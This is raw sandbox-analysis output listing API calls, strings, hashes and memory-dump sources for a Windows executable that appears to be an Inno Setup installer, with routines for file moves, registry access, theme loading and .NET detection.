                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                  • API String ID: 1452528299-4018462623
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                  • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AllocString
                                                                  • String ID:
                                                                  • API String ID: 262959230-0
                                                                  APIs
                                                                  • 73A18830.GDI32(00000000,00000000,00000000), ref: 00414411
                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414419
                                                                  • 73A18830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041442D
                                                                  • 73A122A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414433
                                                                  • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041443E
                                                                  Similarity
                                                                  • API ID: A122A18830$A480
                                                                  • String ID:
                                                                  • API String ID: 3325508737-0
                                                                  • Opcode ID: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                  • Instruction ID: 53d1df8a90047df028643ee63be254e951aa3f987763a81c259c8cb4a1af4cbb
                                                                  • Opcode Fuzzy Hash: 2e378a44b9d760f9e5f1bf7c9b236df4e5f96ed4aa47b9fb48d5ba9b1bbdbb58
                                                                  • Instruction Fuzzy Hash: 7101D43520C3806AE600A63D8C85A9F6BDD9FC6314F05446EF484DB282C979C801C761
                                                                  APIs
                                                                    • Part of subcall function 0041F06C: GetActiveWindow.USER32 ref: 0041F06F
                                                                    • Part of subcall function 0041F06C: GetCurrentThreadId.KERNEL32 ref: 0041F084
                                                                    • Part of subcall function 0041F06C: 73A25940.USER32(00000000,Function_0001F048), ref: 0041F08A
                                                                    • Part of subcall function 004231A0: GetSystemMetrics.USER32(00000000), ref: 004231A2
                                                                  • OffsetRect.USER32(?,?,?), ref: 00424DC1
                                                                  • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E84
                                                                  • OffsetRect.USER32(?,?,?), ref: 00424E95
                                                                    • Part of subcall function 0042355C: GetCurrentThreadId.KERNEL32 ref: 00423571
                                                                    • Part of subcall function 0042355C: SetWindowsHookExA.USER32(00000003,00423518,00000000,00000000), ref: 00423581
                                                                    • Part of subcall function 0042355C: CreateThread.KERNEL32(00000000,000003E8,004234C8,00000000,00000000), ref: 004235A5
                                                                    • Part of subcall function 00424B24: SetTimer.USER32(00000000,00000001,?,004234AC), ref: 00424B3F
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Thread$CurrentOffsetRect$A25940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                  • String ID: nLB
                                                                  • API String ID: 1906964682-2031493005
                                                                  • Opcode ID: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                  • Instruction ID: 6ccba84303d4583ac65c185f09da03f8435108134aba783506c2f58cc8f90ba1
                                                                  • Opcode Fuzzy Hash: d69f4dabb7a698d4e2161d5678524c276ca36ddb1998852898fe681b10175c4d
                                                                  • Instruction Fuzzy Hash: A7812871A00218CFDB14DFA8D884ADEBBF4FF88314F51416AE905AB296E778AD45CF44
                                                                  APIs
                                                                  • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406FF3
                                                                  • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040706D
                                                                  • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070C5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Enum$NameOpenResourceUniversal
                                                                  • String ID: Z
                                                                  • API String ID: 3604996873-1505515367
                                                                  • Opcode ID: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                  • Instruction ID: 6c201072c7e19ab920663406aa1001a3a7646b20d706545eb94c2f0a958ae389
                                                                  • Opcode Fuzzy Hash: 0cda032a99fccbc67731b5396545ffd3d82a8b59ae0714c8f86b613c94d89fe8
                                                                  • Instruction Fuzzy Hash: 17517070E04208ABDB11DF55C941A9EBBF9EF49304F1481BAE500BB3D1D778AE458B6A
                                                                  APIs
                                                                  • SetRectEmpty.USER32(?), ref: 0044D046
                                                                  • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D071
                                                                  • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D0F9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: DrawText$EmptyRect
                                                                  • String ID:
                                                                  • API String ID: 182455014-2867612384
                                                                  • Opcode ID: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                  • Instruction ID: 2c01bf535b7fc2f64207dbeae616ffe24efc4250a83762b1f7dac36c1304b9fc
                                                                  • Opcode Fuzzy Hash: aa4c93a2d6761cb4316e3b9f58fd36adaf3be60b4be49a56ecc8a50fb57c6bd0
                                                                  • Instruction Fuzzy Hash: 6C517171E00248AFDB11DFA9C885BDEBBF8AF49308F14447AE845EB352D7389945CB64
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042EF96
                                                                    • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                  • SelectObject.GDI32(?,00000000), ref: 0042EFB9
                                                                  • 73A1A480.USER32(00000000,?,0042F0A5,00000000,0042F09E,?,00000000,00000000,0042F0C0,?,?,?,?,00000000,00000000,00000000), ref: 0042F098
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: A480A570CreateFontIndirectObjectSelect
                                                                  • String ID: ...\
                                                                  • API String ID: 2998766281-983595016
                                                                  • Opcode ID: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                  • Instruction ID: 43f07ddd406d3cd78f52d868909731211d08e22d210600ca561f601472f043fe
                                                                  • Opcode Fuzzy Hash: aaeb4b64b252ec620ee19bd92df8033ea15f110d648c0c566ea30b5701249572
                                                                  • Instruction Fuzzy Hash: A6318570B00128ABDB11DF99D841BAEB7F9FB48708F90447BF410A7392C7785E44CA59
                                                                  APIs
                                                                  • GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                  • UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                  • RegisterClassA.USER32(?), ref: 004164C6
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Class$InfoRegisterUnregister
                                                                  • String ID: @
                                                                  • API String ID: 3749476976-2766056989
                                                                  • Opcode ID: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                  • Instruction ID: 9d11af1acff112dbe95f15f3a9399eab9f365f4a7252c57533c35fba51c14aa0
                                                                  • Opcode Fuzzy Hash: 58713160258ce5f561964bbdae6a2794c8f6f6caf00f6f1604bd66b56dd4b990
                                                                  • Instruction Fuzzy Hash: 81316F702043409BD720EF68C981B9B77E5AB89308F04457FF949DB392DB39D944CB6A
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 0049778C
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,0049806C,00000000,00497812,?,?,00000000,0049B628), ref: 004977B5
                                                                  • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004977CE
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: File$Attributes$Move
                                                                  • String ID: isRS-%.3u.tmp
                                                                  • API String ID: 3839737484-3657609586
                                                                  • Opcode ID: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                  • Instruction ID: cfa846df06bac921d3cc7342383d8013e9ea743293dbac669405f5124aadd281
                                                                  • Opcode Fuzzy Hash: 5e447f30b23232af434533287497b31b90de18d305760ab90fd2fc5e7a108e0f
                                                                  • Instruction Fuzzy Hash: 05213271E14209AFCF00EBA9C8859AFBBB8AF54314F51457AB414B72D1D6385E01CB59
                                                                  APIs
                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                  • ExitProcess.KERNEL32 ref: 00404E0D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ExitMessageProcess
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1220098344-2970929446
                                                                  • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                  • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                  • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                  • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                  APIs
                                                                    • Part of subcall function 0042C7FC: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C820
                                                                    • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                    • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                  • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456A70
                                                                  • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456A9D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                  • String ID: LoadTypeLib$RegisterTypeLib
                                                                  • API String ID: 1312246647-2435364021
                                                                  • Opcode ID: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                  • Instruction ID: dea98cbdfb45d66fad0868bd7db80167fcb8ebb816cd54e6ac056e4ed8ccdf78
                                                                  • Opcode Fuzzy Hash: e660801773f94f20b04beacac4d0dca05fe01ebd0f05b0c2a082d9499ce0d4df
                                                                  • Instruction Fuzzy Hash: A9119670B00604BFDB11DFA6CD51A5EB7BDEB8A705F518476BC04E3652DA389D04CA54
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 00456F8E
                                                                  • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045702B
                                                                  Strings
                                                                  • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 00456FBA
                                                                  • Failed to create DebugClientWnd, xrefs: 00456FF4
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                  • API String ID: 3850602802-3720027226
                                                                  • Opcode ID: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                  • Instruction ID: 364b6cfc2dd25a83f1288abab6954b7d1953a24f55fd1dbca2d44010d5bb0a44
                                                                  • Opcode Fuzzy Hash: bc4e2302685a1611cdf589b1ebeb412e0de634acd2de00c3d71195a2fbe054b6
                                                                  • Instruction Fuzzy Hash: 6D110471604240ABD310AB689C81B5F7BD49B15319F55403EFA849B3C3D3794C08C7BE
                                                                  APIs
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • GetFocus.USER32 ref: 004781EB
                                                                  • GetKeyState.USER32(0000007A), ref: 004781FD
                                                                  • WaitMessage.USER32(?,00000000,00478224,?,00000000,0047824B,?,?,00000001,00000000,?,?,?,0047FA10,00000000,004808CA), ref: 00478207
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: FocusMessageStateTextWaitWindow
                                                                  • String ID: Wnd=$%x
                                                                  • API String ID: 1381870634-2927251529
                                                                  APIs
                                                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E438
                                                                  • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E447
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$LocalSystem
                                                                  • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                  • API String ID: 1748579591-1013271723
                                                                  APIs
                                                                  • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F57
                                                                    • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00453F7C
                                                                    • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesDeleteErrorLastMove
                                                                  • String ID: DeleteFile$MoveFile
                                                                  • API String ID: 3024442154-139070271
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004592C1,00000000,00459479,?,00000000,00000000,00000000), ref: 004591D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                  • API String ID: 47109696-2631785700
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831C1
                                                                  • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 004831E4
                                                                  Strings
                                                                  • CSDVersion, xrefs: 004831B8
                                                                  • System\CurrentControlSet\Control\Windows, xrefs: 0048318E
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                  • API String ID: 3677997916-1910633163
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B2E,00000000,00453BD1,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FC1,00000000), ref: 0042D902
                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D908
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                  • API String ID: 1646373207-4063490227
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAC8), ref: 0042EB5A
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                  • API String ID: 1646373207-260599015
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004980FE), ref: 0044F777
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F77D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: NotifyWinEvent$user32.dll
                                                                  • API String ID: 1646373207-597752486
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498154,00000001,00000000,00498178), ref: 00497E7E
                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497E84
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                  • API String ID: 1646373207-834958232
                                                                  APIs
                                                                    • Part of subcall function 0044B650: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F76D,004980FE), ref: 0044B677
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B68F
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A1
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6B3
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6C5
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6D7
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6E9
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B6FB
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B70D
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B71F
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B731
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B743
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B755
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B767
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B779
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B78B
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B79D
                                                                    • Part of subcall function 0044B650: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7AF
                                                                  • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498126), ref: 0046442B
                                                                  • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464431
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                  • API String ID: 2238633743-2683653824
                                                                  APIs
                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238), ref: 0047CFB0
                                                                  • FindClose.KERNEL32(000000FF,0047CFDB,0047CFD4,?,?,?,?,00000000,0047D129,?,?,?,00000000,?,0047D238,00000000), ref: 0047CFCE
                                                                  Similarity
                                                                  • API ID: Find$CloseFileNext
                                                                  • String ID:
                                                                  • API String ID: 2066263336-0
                                                                  APIs
                                                                    • Part of subcall function 0042EE28: GetTickCount.KERNEL32 ref: 0042EE2E
                                                                    • Part of subcall function 0042EC80: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECB5
                                                                  • GetLastError.KERNEL32(00000000,00475509,?,?,0049C1D0,00000000), ref: 004753F2
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CountErrorFileLastMoveTick
                                                                  • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
